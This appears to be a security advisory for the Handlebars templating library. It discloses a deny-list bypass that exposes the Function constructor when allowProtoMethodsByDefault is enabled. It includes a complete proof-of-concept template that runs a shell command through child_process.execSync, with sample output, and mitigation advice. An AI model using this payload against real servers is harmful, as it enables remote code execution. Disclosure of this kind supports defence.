Handlebars can expose the Function constructor despite its prototype-access deny list. When a template reaches Function.prototype, its own constructor property is returned before the deny list is checked. An attacker who can render a controlled template with allowProtoMethodsByDefault: true can inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server.
lookupProperty trusts own properties:
if (Object.prototype.hasOwnProperty.call(parent, propertyName)) {
return result;
}
Normally, prototype-derived values reach resultIsAllowed, which blocks dangerous method names such as constructor. However, constructor is itself an own property of prototype objects:
Function.prototype.constructor === Function;
String.prototype.constructor === String;
Object.prototype.constructor === Object;
As a result, once a template reaches Function.prototype, looking up constructor returns Function without consulting the deny list.
An attacker needs to reach any prototype object where constructor is an own property, then access constructor to obtain Function. The shortest path requires only an accessible function in the template context:
const Handlebars = require('handlebars');
// constructor deny list bypass via hasOwnProperty check in lookupProperty
const template = Handlebars.compile(
// construct code array from template string literal
'{{#with a}}' +
'{{lookup "" (push "return process.mainModule.require(\'child_process\').execSync(\'id\').toString()")}}' +
'{{lookup "" (pop)}}' +
'{{lookup "" (shift)}}' +
'{{/with}}' +
// access Function via own property bypass on Function.prototype.constructor
'{{lookup "" (@root.a.push (lookup (lookup fn "__proto__") "constructor"))}}' +
// #each sets depth0=Function without calling it, apply avoids hash body
'{{#each @root}}{{#if @index}}{{else}}' +
'{{#with (this.apply null @root.a)}}{{this}}{{/with}}' +
'{{/if}}{{/each}}'
);
const result = template(
{ fn: function(){}, a: [0] },
{ allowProtoMethodsByDefault: true }
);
console.log(result.trim());
// output: uid=1000(node) gid=1000(node) groups=1000(node)
Do not set allowProtoMethodsByDefault: true when compiling untrusted templates with untrusted data.
{
"cwe_ids": [
"CWE-1289",
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-08T17:52:26Z",
"nvd_published_at": "2026-10-06T20:17:26Z",
"severity": "CRITICAL"
}